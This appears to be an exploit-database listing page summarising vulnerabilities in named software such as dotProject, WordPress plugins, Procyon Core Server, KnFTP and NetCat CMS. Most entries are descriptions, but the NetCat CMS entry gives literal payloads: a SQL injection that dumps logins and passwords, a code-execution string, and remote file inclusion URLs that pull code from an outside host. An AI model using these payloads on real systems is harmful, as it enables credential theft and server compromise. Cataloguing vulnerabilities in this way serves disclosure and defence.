Explore Vulnerabilities

Explore all Exploits:

dotProject 2.1.5 SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. The vulnerable code is located in the modules/ticketsmith/view.php and modules/ticketsmith/common.inc.php files, where user-supplied input is not properly sanitized before being used in a SQL query. This can be exploited to manipulate the SQL query by injecting arbitrary SQL code.

WordPress WP Forum Server plugin <= 1.7 SQL Injection Vulnerability

A SQL injection vulnerability exists in WordPress WP Forum Server plugin version 1.7 and below. An attacker can send a specially crafted POST request, containing malicious SQL code in the edit_post_id parameter, to the vulnerable wpf-insert.php script. This can allow an attacker to execute arbitrary SQL commands on the underlying database.

Procyon Core Server HMI <= v1.13 Coreservice.exe Stack Buffer Overflow

This module exploits a vulnerability in the coreservice.exe component of Procyon Core Server <= v1.13. While processing a password, the application fails to do proper bounds checking before copying data into a small buffer on the stack. This causes a buffer overflow and allows an attacker to overwrite a structured exception handling record on the stack, resulting in unauthenticated remote code execution. After the payload exits, Coreservice.exe should automatically recover.

Slaed CMS Code exec

A code execution vulnerability exists in Slaed CMS versions 4.* and OpenSlaed 1.2 (free). An attacker can exploit this vulnerability by sending a crafted HTTP request containing malicious PHP code to the vulnerable server. The malicious code is executed in the context of the web server process.

NetCat CMS Code exec, SQL-injection

The following vulnerabilities are available on different versions of this software:
SQL injection: /search/?action=index&text=q')+union+select+1,1,concat_ws(0x3a,login,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+User%23
Code exec: /search/?action=index&text={${phpinfo()}}
Remote File Inclusion:
/netcat/modules/filemanager/function.inc.php?MODULE_FOLDER=http://shell?
/netcat/modules/forum2/function.inc.php?MODULE_FOLDER=http://shell?
/netcat/modules/logging/function.inc.php?MODULE_FOLDER=http://shell?

wav player 1.1.3.6 .pll Buffer Overflow

Wav player cannot properly handle large playlists (more than 1G). To reproduce: open the wav player, make a playlist and save it. Then close the player and run this exploit to create the new playlist. When you open wav player again, you will see the calc. ;)

KnFTP Buffer Overflow

A buffer overflow vulnerability exists in KnFTP, which is a non-SafeSEH module. An attacker can exploit this vulnerability by sending a specially crafted payload of 271 bytes to the vulnerable server, which will overwrite EIP and the SEH record. This can be used to execute arbitrary code on the vulnerable system.

WordPress Tune Library plugin <= 2.17 SQL Injection Vulnerability

The WordPress Tune Library plugin version 2.17 and below is vulnerable to SQL injection. The vulnerability is due to the lack of proper sanitization of user-supplied input in the 'letter' parameter of the 'tune-library-ajax.php' script. An attacker can exploit it by sending a maliciously crafted HTTP request to the vulnerable script. This can allow the attacker to gain access to sensitive information such as the version of the database, the current user, and the database name.

MelOn Player 1.0.11.x Denial of Service POC

The main program (IDMelonPlayer.exe) suffers from a buffer overflow vulnerability when opening the p_about.ini file with extra bytes added to parts of the file (Text section), giving attackers the possibility of arbitrary code execution on the system where Melon Player is installed.

Recent Exploits: